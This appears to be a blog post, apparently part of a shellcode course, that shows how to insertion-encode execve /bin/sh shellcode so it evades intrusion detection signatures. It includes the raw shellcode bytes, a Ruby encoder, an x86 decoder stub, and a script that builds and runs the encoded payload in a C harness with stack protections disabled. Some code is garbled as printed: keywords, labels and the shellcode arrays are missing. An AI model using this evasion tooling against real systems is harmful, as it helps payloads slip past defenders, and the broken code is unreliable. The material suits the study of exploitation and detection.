Encoder/Decoder Shellcode

According to Wikipedia, since intrusion detection systems can detect signatures of simple shellcodes being sent over the network, it is often encoded, made self-decrypting or polymorphic to avoid detection. This blog post is on one aspect of the first method, encoding, insertion encoding specifically. Later posts will deal with polymorphic and encrypting/decrypting methods respectively. The insertion encoding method used for the shellcode in this post will be a simple but effective, and hopefully useful, method.

What is insertion encoder/decoder shellcode?
It is shellcode that has been obfuscated, encoded, by inserting random and/or garbage bytes into the shellcode, which is then de-obfuscated, decoded, by a decoder stub upon execution. The encoding can be achieved in any number of ways, this blog post describes one of them. To try and make things a bit clearer, there is a before and after example below.

A simple /bin/sh program using the execve system call which will be translated into shellcode for use in the examples below.

xor     eax,eax
push 	eax
push 	dword 0x68732f2f
push 	dword 0x6e69622f
mov 	ebx,esp
push 	eax
mov 	edx,esp
push 	ebx
mov 	ecx,esp
mov 	al,0xb
int 	0x80

The shellcode before encoding:


and after, not including any end-of-shellcode markers:


The above encoded shellcode then disassembles to give the following:

echo -ne "\x31\xc0\x50\x27\x68\xef\x2f\x2f\x73\x68\xc3" 
         "\x80\xc3" | ndisasm -u -

00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  27                daa
00000004  68EF2F2F73        push dword 0x732f2fef
00000009  68C368EF2F        push dword 0x2fef68c3
0000000E  6269C3            bound ebp,[ecx-0x3d]
00000011  6E                outsb
00000012  89E3              mov ebx,esp
00000014  50                push eax
00000015  EF                out dx,eax
00000016  89E2              mov edx,esp
00000018  27                daa
00000019  53                push ebx
0000001A  37                aaa
0000001B  89E1              mov ecx,esp
0000001D  C3                ret
0000001E  B00B              mov al,0xb
00000020  CD80              int 0x80
00000022  C3                ret

It is obvious that the above code is different from the original, the desired result has been acheived. The next stage is to remove the encoding at runtime, leaving the original shellcode in a state ready to be executed.

How is encoding achieved?
Well, as mentioned earlier there are many different solutions. In choosing a solution there were two guidelines to be adhered to; the first, the solution must be simple and second, the solution must work. With this said, the solution chosen for this blog post is to pick a random byte from a list and insert it randomly into the shellcode. The decoder then only need remove the bytes that are found in the list.
The encoder is written in Ruby, please excuse all Ruby code this is the first time I have used it and I am pretty sure it is bad, but it works.

WARNING: The random_insert_bytes bytes list in the code below should NOT contain any bytes that are also in the shellcode, because those valid bytes in the shellcode will be removed as garbage rendering the decoded shellcode inoperative.

def gen_encoded_shellcode (sc, rib, eb)
  puts "[*] Generate random insertion encoded shellcode..."
  encoded_shellcode = ""

  # created encoded shellcode, make sure that all of the 
  # original shellcode is included in the string.
  sc_index = 0
  while sc_index <= sc.length do
    if rand(1..1000) > 500
      encoded_shellcode += rib[rand(0..rib.length-1)]
      if sc_index <= sc.length
        encoded_shellcode += "#{sc[sc_index]}" 
      sc_index += 1
    encoded_shellcode += ","
  return "#{encoded_shellcode.chop}#{eb}"

shellcode = %w(0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd 0x80)
random_insert_bytes = %w(0x27 0x37 0xd7 0xef 0xc3)
end_byte = "0xbb"

# main
encoded_shellcode = gen_encoded_shellcode shellcode, random_insert_bytes, end_byte	

To make the encoding a bit more random, not only have the bytes been chosen at random from the list, but when the bytes are placed into the shellcode has also been randomised. This is a simple choice of a random number between 1 and 1000, and if the number is greater than 500 then the random byte is placed into the shellcode otherwise the shellcode is written out as normal.

That is all there is to the encoding, it is very simple and even the code presented can be played around with to produce more random results, for example you could place two bytes at a time into the shellcode, you could also use a much larger list of random bytes, etc. As indicated earlier, the next stage will be to write a decoder, which will take the encoded shellcode and reproduce the original in order to execute it successfully.

How is decoding achieved?
Due to the simplicity of the encoder in using a set list of bytes to randomly insert into the shellcode, all the decoder need do is remove those bytes. This turns out to be quite simple to do in assembly language and, as will be shown later, turns out to lend itself well to automating code generation of the entire assembly language code base.
The decoder as per the random bytes in random_insert_bytes in the Ruby encoder.

global _start
section .text
    jmp short call_shellcode
    pop esi
    lea edi, [esi]
    xor eax, eax
    xor ebx, ebx
    mov bl, byte [esi + eax]
    cmp bl, 0x27
    jz  insertionByte
    cmp bl, 0x37
    jz  insertionByte
    cmp bl, 0xd7
    jz  insertionByte
    cmp bl, 0xef
    jz  insertionByte
    cmp bl, 0xc3
    jz  insertionByte
    cmp bl, 0xbb
    jz  short encodedShellcode
    mov byte [edi], bl
    inc edi
    inc eax
    jmp short decode
    inc eax
    jmp decode
    call decoder
encodedShellcode db 

Analysis of decoder:
Lines 4,31,6
using jmp/call/pop technique to load the encoded shellcode into esi.
Line 7,
load address of encoded shellcode into edi. This allows for decoded shellcode to be place in edi and called using encodedShellcode as the address.
Line 11,
move first byte of encoded shellcode into bl register ready for comparing.
Lines 12..20,
compare contents of bl register with bytes in list from ruby source code. If bl is equal to a byte from that list then the search index is increased Line 29, and control is returned to the decode section Line 10. Otherwise the byte is place in the edi register Line 24, the edi index is increased Line 25, the search index is increased Line 26 and control passed back to the decode section Line 10.
Line 22,
check if end of encoded shellcode has been reached by comparing bl with end marker, in this case 0xbb. If the end has been reached control is passed to encodedShellcode address which now contains the decoded shellcode.

As you can see this is a very simple, but effective, method of encoding shellcode, which also gives the benefit of flexibility in that more random bytes can be added, the downside being the decoder section will grow in proportion to random bytes added.

So does the code fulfil the second guideline, does it work!

Build encoder/decoder:
$ nasm -felf32 -o encoder.o encoder.asm
$ ld -o encoder encoder.o

Check for nulls:
$ objdump -D encoder -M intel

encoder:     file format elf32-i386
Disassembly of section .text:

08048060 <_start>:
 8048060:	eb 2f                	jmp    8048091 <call_shellcode>
08048062 :
 8048062:	5e                   	pop    esi
 8048063:	31 c0                	xor    eax,eax
 8048065:	31 db                	xor    ebx,ebx
08048067 :
 8048067:	8a 1c 06             	mov    bl,BYTE PTR [esi+eax*1]
 804806a:	80 fb 27             	cmp    bl,0x27
 804806d:	74 1f                	je     804808e
 804806f:	80 fb 37             	cmp    bl,0x37
 8048072:	74 1a                	je     804808e
 8048074:	80 fb d7             	cmp    bl,0xd7
 8048077:	74 15                	je     804808e
 8048079:	80 fb ef             	cmp    bl,0xef
 804807c:	74 10                	je     804808e
 804807e:	80 fb c3             	cmp    bl,0xc3
 8048081:	74 0b                	je     804808e
 8048083:	80 fb bb             	cmp    bl,0xbb
 8048086:	74 0e                	je     8048096
 8048088:	88 1f                	mov    BYTE PTR [edi],bl
 804808a:	47                   	inc    edi
 804808b:	40                   	inc    eax
 804808c:	eb d9                	jmp    8048067
0804808e :
 804808e:	40                   	inc    eax
 804808f:	eb d6                	jmp    8048067
08048091 <call_shellcode>:
 8048091:	e8 cc ff ff ff       	call   8048062
08048096 :
 8048096:	31 c0                	xor    eax,eax
 8048098:	50                   	push   eax
 8048099:	27                   	daa
 804809a:	68 ef 2f 2f 73       	push   0x732f2fef
 804809f:	68 c3 68 ef 2f       	push   0x2fef68c3
 80480a4:	62 69 c3             	bound  ebp,QWORD PTR [ecx-0x3d]
 80480a7:	6e                   	outs   dx,BYTE PTR ds:[esi]
 80480a8:	89 e3                	mov    ebx,esp
 80480aa:	50                   	push   eax
 80480ab:	ef                   	out    dx,eax
 80480ac:	89 e2                	mov    edx,esp
 80480ae:	27                   	daa
 80480af:	53                   	push   ebx
 80480b0:	37                   	aaa
 80480b1:	89 e1                	mov    ecx,esp
 80480b3:	c3                   	ret
 80480b4:	b0 0b                	mov    al,0xb
 80480b6:	cd 80                	int    0x80
 80480b8:	c3                   	ret
 80480b9:	bb                   	.byte 0xbb

Due to the stack being read only the assembly language binary cannot be tested individually, it must be hosted within a process. First the shellcode must be acquired from the binary.

Get shellcode from executable:
Use the following from the commandlinefu website replacing PROGRAM with the name of the required executable like so,

$ objdump -d ./encoder | grep ‘[0-9a-f]:’ | grep -v ‘file’ | cut -f2 -d: | cut -f1-6 -d’ ‘ | tr -s ‘ ‘ | tr ‘t’ ‘ ‘ | sed ‘s/ $//g’ | sed ‘s/ /x/g’ | paste -d ” -s | sed ‘s/^/”/’ | sed ‘s/$/”/g’

Using the shellcode above, the following C program will be used to test that it works as required.

#include <stdio.h>

unsigned char code[] = 

    int (*ret)() = (int(*)())code;

Build the code:
$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
The options for gcc are to disable stack protection and enable stack execution respectively. Without these options the code will cause a segfault.

Test the shellcode:
If successful the code will return a new shell using /bin/sh.

Analysis of shellcode:
In the analysis of the shellcode a picture is worth a thousand words, or at the very least an execution flowchart is.
The following graphic was created using the sctest tool included in the libemu package found here. This is a very valuable tool in shellcode analysis and should be a part of any programmers toolkit.

The following commands were issued to create the graphic below:
$ echo -ne “\x31\xc0\x50\x27\x68\xef\x2f\x2f\x73\x68\xc3\x68\xef\x2f\x62\x69\xc3\x6e\x89\xe3\x50\xef\x89\xe2\x27\x53\x37\x89\xe1\xc3\xb0\x0b\xcd\x80\xc3” | sctest -vv -Ss 100000 -G shellcode.dot
$ dot shellcode.dot -Tpng -o shellcode.png


The graphic above is also a testament to the simplicity of the code. The method has proved to have been successful therefore with more research and development effort more complex and useful encoder/decoders can be built from this base. For instance to make a polymorphic version of the decoder is trivial, as an example it would be simple to use a loop that scans an address range for the garbage bytes, etc. Polymorphic and encrypting/decrypting based shellcode will be the subject of future blog posts.

Development methodology:
Having never used Ruby for development before it was felt it would be useful to try it during this assignment. It was relatively easy to pick up and use, probably not using it correctly but getting stuff working nonetheless. With the simple design of the encoder/decoder it would be quicker if experiements could be automated using Ruby to write the assembly language code, C test code and execute the test code. Again the code is probably very bad, but it worked very well and allowed for rapid protoyping and testing of different encoding schemas.

The Ruby script used for development is below.

#!/usr/bin/ruby -w

# Parameters
# (string array of hex format bytes) sc 
#   shellcode to be encoded
# (string array of hex format bytes) rib 
#   bytes to be inserted randomly into shellcode
# (string) eb 
#   end byte marker for shellcode
# Returns
# (string)
#   shellcode that has been encoded
def gen_encoded_shellcode (sc, rib, eb)
  puts "[*] Generate random insertion encoded shellcode..."
  encoded_shellcode = ""

  # created encoded shellcode, make sure that all of the 
  # original shellcode is included in the string.
  sc_index = 0
  while sc_index <= sc.length do
    if rand(1..1000) > 500
      encoded_shellcode += rib[rand(0..rib.length-1)]
      if sc_index <= sc.length
        encoded_shellcode += "#{sc[sc_index]}" 
      sc_index += 1
    encoded_shellcode += ","
  return "#{encoded_shellcode.chop}#{eb}"

# Parameters
# (string) esc 
#   encoded shellcode returned from generate_encoded_shellcode method
# (string array of hex format bytes) rib 
#   bytes to be inserted randomly into shellcode
# (string) eb
#   end byte marker for shellcode, must be same as used in 
#   generate_encoded_shellcode method
# (string) fn
#   filename for generated assembly language source code
def gen_asm_code (esc, rib, eb, fn)
  puts "[*] Generate assembly language for encoded shellcode..."
  fn = fn + ".asm"
  asmcode_header = [
    "global _start",
    "section .text", 
    "    jmp short call_shellcode",
    "    pop esi",
    "    lea edi, [esi]",
    "    xor eax, eax",
    "    xor ebx, ebx",
    "    mov bl, byte [esi + eax]"

  asmcode_decode = []	
  rib.each do |x|
    asmcode_decode << "    cmp bl, #{x}"
    asmcode_decode << "    jz  insertionByte"

  asmcode_footer = [
    "    cmp bl, #{eb}",
    "    jz  short encodedShellcode",
    "    mov byte [edi], bl",
    "    inc edi",
    "    inc eax",
    "    jmp short decode",
    "    inc eax",
    "    jmp decode",
    "    call decoder",
    "    encodedShellcode db #{esc}"

  final_asmcode = []
  final_asmcode << asmcode_header 
  final_asmcode << asmcode_decode 
  final_asmcode << asmcode_footer 

  File.open(fn, "w+") do |fsrc|

  puts "[*] Finished writing assembly language source code to #{fn}."

# Parameters
# (string) fn
#   name of assembly executable
def build_assembly_executable (fn)
  puts "[*] Building assembly executable, #{fn}..."

  exit_status = 0
  Open3.popen3("nasm -felf32 -o #{fn}.o #{fn}.asm") { |i,o,e,t|
    exit_status = t.value
  Open3.popen3("ld -o #{fn} #{fn}.o") { |i,o,e,t|
    exit_status = t.value
  return exit_status

# Parameters
# (string) fn
#   name of assembly executable
# (string) cmd
#   command to execute from shell
# Returns
#   (string)
#   shellcode extracted from assmelby executable
def extract_shellcode_from_binary (fn, cmd)
  puts "[*] Extracting shellcode from executable file, #{fn}..."

  extracted_shellcode = ""
  exit_status = 0
  Open3.popen3("./#{cmd} #{fn}") { |i,o,e,t|
    extracted_shellcode = o.gets(nil)
    exit_status = t.value

  return extracted_shellcode

# build c language shellcode template, insert encodedshellcode
# Parameters
# (string) cfn
#   C source filename
# (string) es
#   shellcode extracted from assembly executable
def gen_shellcode_template(cfn, es)
  puts "[*] Generating shellcode template C source file..."
  cfn += ".c"
  sc = ""#{es}";"
  ctemplate = [
    "#include <stdio.h>",
    "unsigned char code[] = ",
    "    int (*ret)() = (int(*)())code;",
    "    ret();",

  File.open(cfn, "w+") do |cfsrc|

# Parameters
# (string) cfn
#   c executable filename
def build_shellcode_binary(cfn)
  puts "[*] Building shellcode binary..."
  exit_status = 0
  Open3.popen3 ("gcc -fno-stack-protector -z execstack -ggdb -o #{cfn} #{cfn}.c") { |i,o,e,t|
    exit_status = t.value
  return exit_status

# Parameters
# (string) cfn
#   c executable filename
def test_shellcode(cfn)
  puts "[*] Finished!"
  puts "n./#{cfn} to test, /bin/sh on success... (Good luck!)nn"

# required modules
require "open3"

# variables for shellcode generation
asmfilename = "EncodedShellcode"
cfilename = "Shellcode"
shellcode = %w(0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd 0x80)
random_insert_bytes = %w(0x27 0x37 0xd7 0xef 0xc3)
end_byte = "0xbb"
extract_shellcode_cmd = "extract_shellcode.sh"

# main 
encoded_shellcode = gen_encoded_shellcode shellcode, random_insert_bytes, end_byte	
gen_asm_code encoded_shellcode, random_insert_bytes, end_byte, asmfilename
build_assembly_executable asmfilename
extracted_shellcode = extract_shellcode_from_binary asmfilename, extract_shellcode_cmd
gen_shellcode_template cfilename, extracted_shellcode
build_shellcode_binary cfilename
test_shellcode cfilename

A simple script, named extract_shellcode.sh, was used to extract the shellcode from a binary and place it into a named file which would be read by the above code and placed into the C test file.

#!/usr/bin/env sh
for i in `objdump -d $1 | tr 't' ' ' | tr ' ' 'n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "x$i" ; done

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s